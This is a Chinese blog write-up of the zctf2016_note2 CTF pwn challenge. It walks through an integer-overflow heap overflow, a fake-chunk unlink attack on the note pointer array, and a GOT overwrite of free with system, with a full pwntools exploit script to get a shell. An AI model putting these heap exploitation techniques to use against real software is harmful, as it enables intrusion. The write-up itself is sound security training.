[BUUCTF]zctf2016_note2

已于 2022-08-13 22:04:56 修改
阅读量1.1k 收藏 1
点赞数
分类专栏: BUUCTF_Pwn 文章标签: 安全
于 2022-08-13 22:04:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyxx_wjc/article/details/126324319
版权

 一道伪造空闲chunk,利用unlink攻击指针数组的题,算是比较典型。

先checksec,堆题不开PIE,八成是打堆块指针数组,然后劫持指针指向got表附近,通过覆写got表拿到shell。

程序有四个功能。前面输入name和Addr都没啥用。

 审计代码,Add,Del,Show都是很简单的,可以得知申请的堆块地址和申请的空间的大小是由两个数组管理的。Del里面没有UAF漏洞。Add中申请0x80可以得到unsorted bin chunk

在读取字符串的函数中,存在一个整数溢出漏洞。这里在for循环的判断条件中,本意是让i在0~size-1的范围内,即输入size个字符。但是这里size-1为有符号数,i为无符号数,比较时会把size-1变为无符号数。而申请堆块时,malloc(0)会返回一个0x20大小的堆块。而size为0时,size-1为0xff ff ff ff ff ff ff ff,这里几乎可以无限制地溢出

Edit函数可以覆盖原本的内容,也可以在后面续写。

这里Edit函数无论是覆写还是拼接都是使用了strcpy和strncat,存在\x00截断的问题。我们通过2中拼接操作来处理size为0的堆块,这样在下面v2[size-strlen(dest)+14]=0所截断的位置就不会在我们输入的内容当中。就可以将输入的一长串内容全部拼接到原来的内容之后

思路:伪造堆块fake chunk,并且事先在fake  chunk后面申请过一个unsorted bin chunk,同时在unsorted bin chunk 和fake chunk之间预留一个通过size为0申请的chunk,以实现堆溢出,通过堆溢出来修改下一个堆块的size标记位(0x91变为0x90),并覆写prev_size字段。这样,fake chunk在我们释放这个unsorted bin chunk时,会被视为已经被释放的堆块,会触发堆块合并,即触发fake chunk 的unlink。

这样通过unlink,就可以让一个堆块指针指向指针数组ptr的上方,然后在劫持指针指向got表,泄露libc基址并且修改free函数got表为system函数地址或者onegadget地址

exp:

from pwn import *

context.terminal=['tmux','splitw','-h']
context.arch='amd64'
#context.log_level='debug'

#r=remote('node4.buuoj.cn',25932)
r=process('/home/wjc/Desktop/note2')
e=ELF('/home/wjc/Desktop/note2')
libc=ELF('/home/wjc/Desktop/BUUCTF/libc/libc-2.23_64.so')

ptr=0x602120

def welcome(name,addr):
    r.recvuntil("Input your name:")
    r.sendline(name)
    r.recvuntil("Input your address:")
    r.sendline(addr)
def cmd(idx):
    r.recvuntil('option--->>')
    r.sendline(str(idx))
def Add(size,content):
    cmd(1)
    r.recvuntil("Input the length of the note content:(less than 128)")
    r.sendline(str(size))
    r.recvuntil('Input the note content:')
    r.sendline(content)
def Del(idx):
    cmd(4)
    r.recvuntil('Input the id of the note:')
    r.sendline(str(idx))
def Edit(idx,Type,content):
    cmd(3)
    r.recvuntil('Input the id of the note:')
    r.sendline(str(idx))
    r.recvuntil('do you want to overwrite or append?[1.overwrite/2.append]')
    r.sendline(str(Type))
    r.recvuntil('TheNewContents:')
    r.sendline(content)
def Show(idx):
    cmd(2)
    r.recvuntil("Input the id of the note:")
    r.sendline(str(idx))


welcome("wjc","jiangsu")
Add(0x80,'a'*8+p64(0xa1)+p64(ptr-0x18)+p64(ptr-0x10))
Add(0,'b'*0x10)
Add(0x80,'cccc')
Add(0x10,'/bin/sh\x00')
Edit(1,2,8*'b'+'\x90')

Edit(1,1,'b'*0x10+'a'*7)
Edit(1,1,'b'*0x10+'a'*6)
Edit(1,1,'b'*0x10+'a'*5)
Edit(1,1,'b'*0x10+'a'*4)
Edit(1,1,'b'*0x10+'a'*3)
Edit(1,1,'b'*0x10+'a'*2)
Edit(1,1,'b'*0x10+'\xa0')

Del(2)

Edit(0,1,0x18*'a'+p64(e.got['free']));
Show(0)
free_addr=u64(r.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libcbase=free_addr-(0x7f22c21e94f0-0x7f22c2165000)
system_addr=libcbase+libc.symbols['system']
Edit(0,1,p64(system_addr))
print("libcbase:",hex(libcbase))
print("system_addr:",hex(system_addr))

Del(3)

#gdb.attach(r)

r.interactive()

Jmp.Cliff
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF内存取证三项.7z
11-16
CTF取证分析赛题,对学习有很大帮助。
浅析Android平台漏洞挖掘.pdf
08-07
同时,他/她还是一位CTF(Capture The Flag)竞赛选手,参加过ZCTF和0ctf等比赛。这也暗示了文档中可能包含了一些漏洞挖掘的实际案例分析,或者通过CTF比赛中的实际案例来解释Android漏洞挖掘的相关知识点。 从以上...
2016 ZCTF——note2
04-20 350
64位程序,没开PIE  #unlink 程序逻辑 1 void __fastcall main(__int64 a1, char **a2, char **a3) 2 { 3 setvbuf(stdin, 0LL, 2, 0LL); 4 setvbuf(stdout, 0LL, 2, 0LL); 5 setvbuf(stderr, 0LL, 2...
zctf2016_note2
z1r0的博客
02-02 575
zctf2016_note2 查看保护 这是一个漏洞点。在edit的时候 ,选择append时就会产生越界,如果size开始为0,则v1[v6 - strlen(&dest) + 14] <= 14了,所以在执行strncat时可以无限附加覆盖下一个堆块。所以可以申请fastbin,因为可以覆盖后面的堆块,在name中伪装假的堆块,然后对其进行释放这样再申请时就会得到其地址,从而改写指针 简单理解的话就是size为0的chunk可以无限追加数据。然后追加到最后可以修改heap_ptr那里的
2016 ZCTF note2
Morphy_Amo的博客
01-27 2631
堆溢出中unlink的应用
zctf_2016_note2
xieyichensss的博客
07-03 153
这是一道unlink的题,非常经典。 unlink是什么,顾名思义,就是把其中一个chunk块给free掉。会将堆块的地址变成存放堆块地址的地址附近。 看图 需要绕过的检查: 1.后一个堆快的prev_size为要为unlink堆块的大小。并且pre_inuse要为0,只有这样,prev_size才有效。 2.需要构造fake_fd,fake_bk。 (这里不考虑large_bin的检测) fd_nextsize和bk_nextsize 思路 1.首先一定要泄露libc基址,这样才能向下进行攻击。那么,如
2016_ZCTF_Pwn note2(unlink)
Pwnpanda的博客
08-05 594
暑假学习计划 - 0x03 2016_ZCTF_note2 详细分析参考:CTF Wiki 肝了一下午 + 一晚上,还是有一部分还不是很理解: ①为什么payload1后面一定要加上p64(64)+p64(0x60),为什么不能删除或者改大小; ②分配的三个堆块,为什么第一个和第三个大小一定是0x80; 路过的各位大佬,如果知道麻烦指点一些,谢谢啦 from pwn import...
[BUUCTF]PWN——zctf2016_note2(unlink)
mcmuyanga的博客
02-07 822
zctf2016_note2 附件 步骤 例行检查,64位程序,开启了canary和nx 试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入,方便看程序,我修改了函数名 New_note() 定义的时候i是unsigned_int64,但是for循环里的i是int64.我们都知道,在c语言中,无符号变量和有符号变量比较时,会将有符号变量转化为无符号变量来比较。所以这里size为0的时候。(unsigned int)(size-1)就就是非常大的整数,存在整数溢出漏洞 show_not
[Buuoj]zctf2016_note2
zylxixixi的博客
11-10 315
思路一: 利用house系列的中的house of force,将goodbye_message的地址覆盖为magic的地址,从而输出flag地址 思路二 利用unlink漏洞,泄露libc基址并且将atoi的got表项修改为system的地址,最后输入/bin/sh
【unlink】 zctf2016_note2
huzai9527的博客
04-19 230
【unlink】 zctf2016_note2 1.ida分析 堆溢出,unsigned int用于判断条件,导致的堆溢出 指针数组 2.思路 创建3个chunk,chunk0、chunk1、chunk2,通过chunk1连接chunk0,chunk2。构造unlink 在chunk0,构造fake chunk,free(chunk1)然后再申请修改chunk2的size,add(0,'b'*0x10 + p64(0xa0)+p64(0x90)) 释放chunk2,unlin
2016 ZCTF note2 题解
coco的博客
12-01 872
程序分析 先查看程序开启的保护,可以看到没有开启PIE。并且也是一个经典的菜单程序。 new note函数 可以看到,我们一共能申请四个堆块,堆块的指针,数量都存储在bss端上。我们能申请超过0x80的堆块,并在其中写入内容,这里的大小被限制了。但是我们进入my_read函数后就能发现for循环的条件中,size为int类型,而i是unsigned int类型。我们都知道,在c语言中,无符号变...
unlink 2016 zctf note2
qq_36918532的博客
01-18 150
题目可在buuctf下载 这章还是unlink的复习 拖到IDA里面可以看到,开头让输入名字,地址(其实没卵用) 然后看下面的菜单分别是新增,打印,编辑,释放 在新增功能中size是无符号数,所以当size为0的时候,0-1之后为无穷大的数,也就是能向堆中写入无穷大的数0xffff…,根据glibc规定会分配0X20个字节,但是读取的时候不受限制,会产生堆溢出 并且最多四个堆块 同时我们可以看出ptr是存放content的地址(0x602120),id存放在0x602160,size存放在0x602140
Unlink——2016 ZCTF note2解析
weixin_30256505的博客
12-14 201
简介 Unlink是经典的堆漏洞,刚看到这个漏洞不知道如何实现任意代码执行,所以找了一个CTF题,发现还有一些细节的地方没有讲的很清楚,题目在这里。自己也动手写一遍,体验一下 题目描述 首先,我们先分析一下程序,在checksec中检查文件,发现是64位程序,然后放入IDA中,f5,,得出主程序是这样: void __fastcall main(__int64 a1, c...
zctfnote2
qq_33590156的博客
08-04 119
首先,有符号整数和无符号整数对比时,统一化为无符号整数对比,所以本题中,输入size为0,则循环中变为-1,也就是无符号中最大的数,实现无限写进行溢出。 然后,unlink中,决定大小的只有fakechunk的size和后面的某个chunk的presize,两个chunk中间的chunk都可以通过修改大小来覆盖掉。而且,无所谓合并后这个chunk去哪儿了,都会将list指针修改掉。 最后是打的menu函数中的atoi,本来想打freegot,结果因为chunk不太够无法打。 from pwn import
buuctf GUESS,ZCTF note2学习
weixin_46521144的博客
07-09 277
GUESS 知识点 stack smash\environ泄露栈地址 题解 这道题是一道栈题,好久没见栈题。 可以看到程序会把flag读入内存,之后fork子进程让你猜。这里需要事先了解fork工作方式:把父进程虚拟内存空间完全复制一份(具体来说,私有写时复制)这说明子进程会复制flag,以及栈上所有内容。利用这一点以及题目给我们的三次机会,结合canary smash原理解题。 stack smash之后会输出一串字符串,其地址是environ[0]。基本思路是通过gets()栈溢出,修改environ[
ZCTF - 2016 - Reverse100
风靡义磊的博客
07-21 1794
ZCTF2016的第一道逆向
ctf pwn 题目
m0_64195960的博客
04-11 1376
2022年3月21栈迁移 这道题是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
unlink函数_堆利用之 unlink
weixin_39736047的博客
12-11 692
1 知识补充什么是unlinkunlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来。哪里用到unlinkunlink()常用于free()中进行 chunk 的整理,可以对空闲 chunk 进行前向合并和后向合并。当被free()的 chunk 的 P 位为 0 时,说明被free()的 chunk 的前一个 chunk 为空,于是对前一个 chunk 进行 unlink...
zctf_2016_note3
seaaseesa的博客
04-17 790
zctf_2016_note3 首先检查一下程序的保护机制 然后用IDA分析一下,edit里存在一个整数溢出导致堆溢出的漏洞。当输入为0x8000000000000000时,即可使得index为-1,由于输入的长度不够,因此将0x8000000000000000转为负数的形式输入进去即可。然后就是正常的unlink了。 #coding:utf8 from pwn import * ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值